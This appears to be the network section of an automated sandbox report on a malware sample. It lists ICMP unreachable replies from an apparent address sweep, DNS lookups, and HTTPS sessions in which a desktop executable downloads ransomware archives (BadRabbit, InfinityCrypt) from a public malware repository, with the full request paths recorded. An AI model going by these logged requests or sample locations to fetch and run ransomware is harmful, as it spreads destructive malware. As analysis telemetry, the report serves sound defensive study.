                                                                                                                                                                                      Sep 29, 2022 14:50:27.954050064 CEST87.98.179.112192.168.2.6cab0(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.954070091 CEST87.98.179.113192.168.2.6cab1(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.954092026 CEST87.98.179.118192.168.2.6cab6(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.954818010 CEST87.98.179.115192.168.2.6cab3(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.959498882 CEST87.98.179.125192.168.2.6cabd(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.959647894 CEST87.98.179.123192.168.2.6cab4(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.963228941 CEST87.98.179.135192.168.2.6cac7(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.963520050 CEST87.98.179.137192.168.2.6cac9(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:27.963555098 CEST87.98.179.136192.168.2.6cac8(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.012641907 CEST87.98.179.153192.168.2.6cad9(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.018584967 CEST87.98.179.142192.168.2.6cace(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.019541025 CEST87.98.179.149192.168.2.6cad5(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.020435095 CEST87.98.179.159192.168.2.6cad8(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.020479918 CEST87.98.179.155192.168.2.6cad1(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.020720959 CEST87.98.179.162192.168.2.6cae2(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.020740032 CEST87.98.179.166192.168.2.6cae6(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.021979094 CEST87.98.179.164192.168.2.6cae4(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.022335052 CEST87.98.179.160192.168.2.6cae0(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.022521019 CEST87.98.179.171192.168.2.6caeb(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.022593021 CEST87.98.179.173192.168.2.6caed(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.024058104 CEST87.98.179.188192.168.2.6cafc(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.024480104 CEST87.98.179.187192.168.2.6cafb(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.025006056 CEST87.98.179.189192.168.2.6cafd(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.025965929 CEST87.98.179.196192.168.2.6cb04(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.026321888 CEST87.98.179.201192.168.2.6cb09(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.026387930 CEST87.98.179.199192.168.2.6cb07(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.026957035 CEST87.98.179.206192.168.2.6cb0e(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.027107954 CEST87.98.179.210192.168.2.6cb12(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.027720928 CEST87.98.179.214192.168.2.6cb16(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.028101921 CEST87.98.179.218192.168.2.6cb1a(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.028122902 CEST87.98.179.216192.168.2.6cb18(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.028141975 CEST87.98.179.213192.168.2.6cb15(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.028398991 CEST87.98.179.222192.168.2.6cb1e(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.028517008 CEST87.98.179.223192.168.2.6cb1f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.028541088 CEST87.98.179.221192.168.2.6cb1d(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.028563976 CEST87.98.179.220192.168.2.6cb1c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.029433966 CEST87.98.179.229192.168.2.6cb1e(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.030123949 CEST87.98.179.232192.168.2.6cb28(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.031131029 CEST87.98.179.240192.168.2.6cb30(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.032267094 CEST87.98.179.242192.168.2.6cb32(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.033287048 CEST87.98.179.246192.168.2.6cb36(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.033451080 CEST87.98.179.245192.168.2.6cb35(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.034260988 CEST87.98.179.251192.168.2.6cb3b(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:28.034996033 CEST87.98.179.230192.168.2.6cb26(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:29.078186989 CEST87.98.179.255192.168.2.6cb3f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.484987020 CEST87.98.176.1192.168.2.6c736(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.486474037 CEST87.98.176.9192.168.2.6c73e(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.486653090 CEST87.98.176.14192.168.2.6c73c(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.486671925 CEST87.98.176.15192.168.2.6c744(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.486686945 CEST87.98.176.8192.168.2.6c73d(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.486804962 CEST87.98.176.10192.168.2.6c73f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.486821890 CEST87.98.176.7192.168.2.6c73c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.487034082 CEST87.98.176.16192.168.2.6c745(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.487179995 CEST87.98.176.11192.168.2.6c740(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.487287998 CEST87.98.176.17192.168.2.6c746(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.487844944 CEST87.98.176.25192.168.2.6c74e(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.487860918 CEST87.98.176.27192.168.2.6c750(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.488193989 CEST87.98.176.24192.168.2.6c74d(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.501060009 CEST87.98.176.34192.168.2.6c750(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.501765013 CEST87.98.176.39192.168.2.6c75c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.505836010 CEST87.98.176.90192.168.2.6c78f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.508115053 CEST87.98.176.33192.168.2.6c756(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.508272886 CEST87.98.176.35192.168.2.6c758(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.508815050 CEST87.98.176.38192.168.2.6c75b(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.509816885 CEST87.98.176.42192.168.2.6c75f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.509917021 CEST87.98.176.53192.168.2.6c76a(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.510077953 CEST87.98.176.55192.168.2.6c76c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.510672092 CEST87.98.176.58192.168.2.6c76f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:33.512392044 CEST87.98.176.74192.168.2.6c77f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:34.815957069 CEST87.98.177.243192.168.2.6c928(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:34.816536903 CEST87.98.177.244192.168.2.6c929(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:34.817562103 CEST87.98.177.250192.168.2.6c92f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:34.820175886 CEST87.98.177.233192.168.2.6c914(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.149032116 CEST87.98.178.12192.168.2.6c941(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.156023026 CEST87.98.177.255192.168.2.6c934(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.156260967 CEST87.98.178.0192.168.2.6c935(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.156374931 CEST87.98.178.9192.168.2.6c93e(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.946513891 CEST87.98.178.27192.168.2.6c950(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.951260090 CEST87.98.178.19192.168.2.6c948(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.951766014 CEST87.98.178.13192.168.2.6c942(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.951884985 CEST87.98.178.22192.168.2.6c94b(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.951921940 CEST87.98.178.21192.168.2.6c943(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.952217102 CEST87.98.178.25192.168.2.6c94e(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.952234030 CEST87.98.178.52192.168.2.6c969(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.952495098 CEST87.98.178.54192.168.2.6c96b(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.953820944 CEST87.98.178.29192.168.2.6c952(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.953840017 CEST87.98.178.26192.168.2.6c94f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.956490040 CEST87.98.178.33192.168.2.6c956(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.956877947 CEST87.98.178.37192.168.2.6c95a(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.957123995 CEST87.98.178.36192.168.2.6c959(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.957242012 CEST87.98.178.39192.168.2.6c95c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.957829952 CEST87.98.178.38192.168.2.6c95b(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.957931995 CEST87.98.178.35192.168.2.6c958(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.958821058 CEST87.98.178.44192.168.2.6c961(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.960256100 CEST87.98.178.55192.168.2.6c96c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.960445881 CEST87.98.178.58192.168.2.6c96f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.960808992 CEST87.98.178.62192.168.2.6c973(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.961327076 CEST87.98.178.59192.168.2.6c970(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.961405039 CEST87.98.178.60192.168.2.6c971(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.961724997 CEST87.98.178.61192.168.2.6c972(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.962742090 CEST87.98.178.69192.168.2.6c970(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.962800980 CEST87.98.178.71192.168.2.6c97c(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.962966919 CEST87.98.178.74192.168.2.6c97f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.963530064 CEST87.98.178.76192.168.2.6c97a(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.964056015 CEST87.98.178.79192.168.2.6c984(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:36.964417934 CEST87.98.178.81192.168.2.6c986(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.085289001 CEST87.98.178.120192.168.2.6c9ad(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.088329077 CEST87.98.178.90192.168.2.6c98f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.088922977 CEST87.98.178.95192.168.2.6c994(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.088963985 CEST87.98.178.89192.168.2.6c98e(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.089195967 CEST87.98.178.97192.168.2.6c996(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.090575933 CEST87.98.178.106192.168.2.6c99f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.090607882 CEST87.98.178.99192.168.2.6c998(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.092739105 CEST87.98.178.121192.168.2.6c9ae(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.092930079 CEST87.98.178.122192.168.2.6c9af(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.093343973 CEST87.98.178.125192.168.2.6c9b2(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.153059006 CEST87.98.178.145192.168.2.6c9c6(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.155491114 CEST87.98.178.130192.168.2.6c9b7(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.156173944 CEST87.98.178.131192.168.2.6c9b8(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.157238007 CEST87.98.178.181192.168.2.6c9ea(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.157722950 CEST87.98.178.186192.168.2.6c9ef(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.158020020 CEST87.98.178.176192.168.2.6c9e5(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.158147097 CEST87.98.178.193192.168.2.6c9f6(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.158457994 CEST87.98.178.190192.168.2.6c9f3(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.160164118 CEST87.98.178.146192.168.2.6c9c7(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.161391973 CEST87.98.178.152192.168.2.6c9cd(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.161565065 CEST87.98.178.148192.168.2.6c9c9(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.162739992 CEST87.98.178.159192.168.2.6c9d4(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.163408041 CEST87.98.178.172192.168.2.6c9e1(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.163984060 CEST87.98.178.178192.168.2.6c9e7(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.164129972 CEST87.98.178.173192.168.2.6c9e2(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.164911032 CEST87.98.178.167192.168.2.6c9dc(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.165186882 CEST87.98.178.189192.168.2.6c9f2(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.165257931 CEST87.98.178.183192.168.2.6c9ec(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.165458918 CEST87.98.178.188192.168.2.6c9f1(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.165735960 CEST87.98.178.184192.168.2.6c9ed(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.166620016 CEST87.98.178.194192.168.2.6c9f7(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.184858084 CEST87.98.178.197192.168.2.6c9fa(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.184890985 CEST87.98.178.195192.168.2.6c9f8(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.185626984 CEST87.98.178.199192.168.2.6c9fc(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.186482906 CEST87.98.178.205192.168.2.6ca02(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.186511040 CEST87.98.178.206192.168.2.6ca03(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.196088076 CEST87.98.178.241192.168.2.6ca26(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.199071884 CEST87.98.178.208192.168.2.6ca05(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.199100018 CEST87.98.178.207192.168.2.6ca04(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.199656010 CEST87.98.178.213192.168.2.6ca03(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.200354099 CEST87.98.178.212192.168.2.6ca02(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.200642109 CEST87.98.178.214192.168.2.6ca0b(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.201364994 CEST87.98.178.225192.168.2.6ca16(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.202166080 CEST87.98.178.234192.168.2.6ca1f(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.202718019 CEST87.98.178.236192.168.2.6ca21(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.202908039 CEST87.98.178.237192.168.2.6ca22(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.203046083 CEST87.98.178.240192.168.2.6ca25(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.203609943 CEST87.98.178.246192.168.2.6ca2b(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.205538988 CEST87.98.178.247192.168.2.6ca25(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.205981016 CEST87.98.178.249192.168.2.6ca2e(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.206783056 CEST87.98.178.251192.168.2.6ca26(Unknown)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:37.207504988 CEST87.98.178.254192.168.2.6ca33(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:48.152796984 CEST87.98.179.3192.168.2.6ca38(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:48.158564091 CEST87.98.178.255192.168.2.6ca34(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:48.158951998 CEST87.98.179.0192.168.2.6ca35(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:48.160957098 CEST87.98.179.5192.168.2.6ca3a(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:48.160984039 CEST87.98.179.4192.168.2.6ca39(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:48.161050081 CEST87.98.179.13192.168.2.6ca42(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:48.168560028 CEST87.98.179.8192.168.2.6ca3d(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:48.169019938 CEST87.98.179.14192.168.2.6ca43(Port unreachable)Destination Unreachable
                                                                                                                                                                                      Sep 29, 2022 14:50:48.169045925 CEST87.98.179.20192.168.2.6ca49(Port unreachable)Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 29, 2022 14:49:48.360481024 CEST | 192.168.2.6 | 8.8.8.8 | 0x4e9 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Sep 29, 2022 14:49:48.983381987 CEST | 192.168.2.6 | 8.8.8.8 | 0xca79 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 29, 2022 14:49:48.382462978 CEST | 8.8.8.8 | 192.168.2.6 | 0x4e9 | No error (0) | github.com | | 140.82.121.4 | A (IP address) | IN (0x0001) | false
Sep 29, 2022 14:49:49.000629902 CEST | 8.8.8.8 | 192.168.2.6 | 0xca79 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Sep 29, 2022 14:49:49.000629902 CEST | 8.8.8.8 | 192.168.2.6 | 0xca79 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Sep 29, 2022 14:49:49.000629902 CEST | 8.8.8.8 | 192.168.2.6 | 0xca79 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Sep 29, 2022 14:49:49.000629902 CEST | 8.8.8.8 | 192.168.2.6 | 0xca79 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                      • github.com
                                                                                                                                                                                      • raw.githubusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49718 | 140.82.121.4 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-29 12:49:48 UTC | 0 | OUT | GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                                                      Host: github.com
                                                                                                                                                                                      Connection: Keep-Alive
2022-09-29 12:49:48 UTC | 0 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                      Server: GitHub.com
                                                                                                                                                                                      Date: Thu, 29 Sep 2022 12:48:20 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                      Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                                                      Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                      Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
2022-09-29 12:49:48 UTC | 0 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49719 | 185.199.108.133 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-29 12:49:49 UTC | 2 | OUT | GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                                                      Host: raw.githubusercontent.com
                                                                                                                                                                                      Connection: Keep-Alive
2022-09-29 12:49:49 UTC | 2 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Content-Length: 402632
                                                                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                      Content-Type: application/zip
                                                                                                                                                                                      ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9"
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                      X-GitHub-Request-Id: 081E:1220:100920B:1104BA2:633592FF
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Date: Thu, 29 Sep 2022 12:49:49 GMT
                                                                                                                                                                                      Via: 1.1 varnish
                                                                                                                                                                                      X-Served-By: cache-mxp6942-MXP
                                                                                                                                                                                      X-Cache: HIT
                                                                                                                                                                                      X-Cache-Hits: 1
                                                                                                                                                                                      X-Timer: S1664455789.067349,VS0,VE162
                                                                                                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      X-Fastly-Request-ID: 98568e9d6ba1c33abf49b41b7ff3e74df9c527af
                                                                                                                                                                                      Expires: Thu, 29 Sep 2022 12:54:49 GMT
                                                                                                                                                                                      Source-Age: 0
                                                                                                                                                                                      Data Ascii: ImiPqI~=;Qj/6t/v;t;FHnGm3$Cb'!r|F#=HWgH=.8Hb<T|c14A^-+cab1~Fjtz-M(r^R3iR1*7^b; CD]]xg%b;7A^CYm|2%np;Mm1


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.6 | 49746 | 140.82.121.4 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe

Timestamp | kBytes transferred | Direction | Data
2022-09-29 12:50:28 UTC | 1113 | OUT | GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1
Host: github.com
2022-09-29 12:50:28 UTC | 1113 | IN | HTTP/1.1 302 Found
Server: GitHub.com
Date: Thu, 29 Sep 2022 12:48:36 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin: https://render.githubusercontent.com
Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
